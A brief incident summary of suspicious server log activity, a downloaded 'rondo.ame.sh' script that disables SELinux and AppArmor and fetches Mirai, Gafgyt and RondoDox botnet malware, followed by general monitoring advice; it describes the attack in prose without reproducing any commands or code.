Suspicious Server Log Activity Indicates Potential Botnet Infection

The user reported finding suspicious activity in their server logs, including an attempt to access a file named "login.py" and a shell command that downloads and executes a script called "rondo.ame.sh". This script disables SELinux and AppArmor, which are critical security mechanisms on Linux systems. It also downloads additional files and clears the bash history to cover its tracks. Further investigation revealed that the downloaded files include executables identified as the Mirai trojan, the Gafgyt trojan, and RondoDox. These malware strains are commonly used in botnets for launching DDoS attacks. The technical implications are significant, as disabling SELinux and AppArmor reduces the system's security posture, making it easier for attackers to perform malicious activities. The presence of Mirai and Gafgyt suggests that the attacker might be attempting to enlist the compromised server into a botnet. This incident highlights the importance of monitoring server logs for suspicious activity and maintaining robust security measures. Organizations should ensure proper logging and monitoring to detect such activities early. Keeping systems updated and using intrusion detection systems can help mitigate such threats.